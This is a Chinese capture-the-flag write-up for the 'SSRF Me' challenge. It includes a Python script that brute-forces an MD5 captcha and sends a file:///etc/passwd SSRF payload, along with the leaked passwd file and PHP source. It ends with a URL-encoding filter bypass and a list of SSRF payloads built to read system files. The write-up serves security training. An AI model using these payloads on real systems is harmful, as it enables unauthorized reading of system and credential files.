题目:攻防世界-题目名称-SSRF Me
提示:ssrf md5爆破
步骤
- 第二个输入框上面有一段代码,应该是验证码的验证逻辑:
需要找到一个字符串(captcha),使得其 MD5 哈希值的最后 6 位等于 "0d5913"。这是一个典型的逆向哈希问题,通常需要通过暴力破解(Brute Force)来解决。
写了个python脚本进行爆破和执行ssrf的协议利用
c
import hashlib
import re
import time
import requests
def brute_force(target):
print("开始爆破...")
counter = 0
start_time = time.time()
try:
while True:
text = str(counter)
md5_hash = hashlib.md5(text.encode()).hexdigest()
if md5_hash.endswith(target):
print(f"\n[+] 找到碰撞!")
print(f"原文: {text}")
print(f"MD5: {md5_hash}")
print(f"耗时: {time.time() - start_time:.2f} 秒")
return text
break
# 每100万次显示进度
if counter % 1_000_000 == 0 and counter > 0:
elapsed = time.time() - start_time
print(f"已尝试: {counter:,} 个 | 速度: {counter / elapsed:,.0f}/秒")
counter += 1
except KeyboardInterrupt:
print(f"\n\n已停止,最后尝试: {counter:,} 个")
pattern = re.compile(r'-6, 6\) == \"(.*)\" <')
url1 = "http://61.147.171.103:59708/index.php"
req1 = requests.session()
response1 = req1.get(url1)
search = pattern.findall(response1.text)
code = search[0]
print(code)
target = code # 目标后缀
captcha = brute_force(target)
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:145.0) Gecko/20100101 Firefox/145.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
}
payurl = "file:///etc/passwd"
payload = {"url": payurl, "captcha": captcha}
req2 = req1.post(url1, data=payload, headers=headers)
print(req2.text)执行一下看看返回结果:
c
开始爆破... (按 Ctrl+C 停止)
[+] 找到碰撞!
原文: 35098
MD5: f9cf9ae3220a49d08fc3d463c5802025
耗时: 0.04 秒
<html>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>SSRF</title>
<link rel="stylesheet" href="./static/semantic.min.css" >
<script src="./static/semantic.min.js"></script>
<body style="background-color: #8CD3F7">
<br>
<div class="ui container">
<form method="post">
<div class="ui form">
<div class="field">
<label>Visit URL</label>
<input type="text" id="url" name="url" placeholder="http://127.0.0.1:80/" hint="本靶机不能访问外网">
</div>
<div class="field">
<label>Captcha: substr(md5(captcha), -6, 6) == "802025" <a href="./index.php?reset">reset</a></label>
<input type="text" id="captcha" name="captcha">
</div>
<div class="field">
<button class="ui button submit" type="submit">Submit</button>
</div>
</div>
</form>
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
</div>
</body>
</html>看到结尾返回了passwd内容,接下来依次读取了index.php
c
<?php
error_reporting(0);
session_start();
require_once "lib.php";
init();
$is_die = 0;
$is_post = 0;
$die_mess = '';
$url = '';
if (isset($_POST['url']) && isset($_POST['captcha']) && !empty($_POST['url']) && !empty($_POST['captcha']))
{
$url = $_POST['url'];
$captcha = $_POST['captcha'];
$is_post = 1;
if ( $captcha !== $_SESSION['answer'])
{
$die_mess = "wrong captcha";
$is_die = 1;
}
if ( preg_match('/flag|proc|log/i', $url) ) // 过滤
{
$die_mess = "hacker";
$is_die = 1;
}
}
?>
<html>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>SSRF</title>
<link rel="stylesheet" href="./static/semantic.min.css" >
<script src="./static/semantic.min.js"></script>
<body style="background-color: #8CD3F7">
<br>
<div class="ui container">
<form method="post">
<div class="ui form">
<?php
if ($is_die)
echo"<div class='ui error message' style='display: block'>$die_mess</div>\n";
?>
<div class="field">
<label>Visit URL</label>
<input type="text" id="url" name="url" placeholder="http://127.0.0.1:80/" hint="本靶机不能访问外网">
</div>
<div class="field">
<label>Captcha: substr(md5(captcha), -6, 6) == "<?=$_SESSION['captcha'] ?>" <a href="./index.php?reset">reset</a></label>
<input type="text" id="captcha" name="captcha">
</div>
<div class="field">
<button class="ui button submit" type="submit">Submit</button>
</div>
</div>
</form>
<?php
if ( $is_die === 0 && $is_post === 1 ) {
echo curl($url);
set_session();
}
?>
</div>
</body>
</html>
</div>
</body>
</html>看到存在过滤代码:
c
if ( preg_match('/flag|proc|log/i', $url) ) // 过滤
{
$die_mess = "hacker";
$is_die = 1;
}不让读取log、flag等。试试直接读取flag文件,不过得试试编码绕过。flag=%66%6C%61%67
payload:file:///%66%6C%61%67
记录一些绕过ssrf的payload
c
file:/etc/passwd?/
file:/etc/passwd%3F/
file:/etc%252Fpasswd/
file:/etc%252Fpasswd%3F/
file:///etc/?/../passwd
file:///etc/%3F/../passwd
file:${br}/et${u}c/pas${te}swd?/
file:$(br)/et$(u)c/pas$(te)swd?/
file:${br}/et${u}c%252Fpas${te}swd?/
file:$(br)/et$(u)c%252Fpas$(te)swd?/
file:${br}/et${u}c%252Fpas${te}swd%3F/
file:$(br)/et$(u)c%252Fpas$(te)swd%3F/
file:///etc/passwd?/../passwd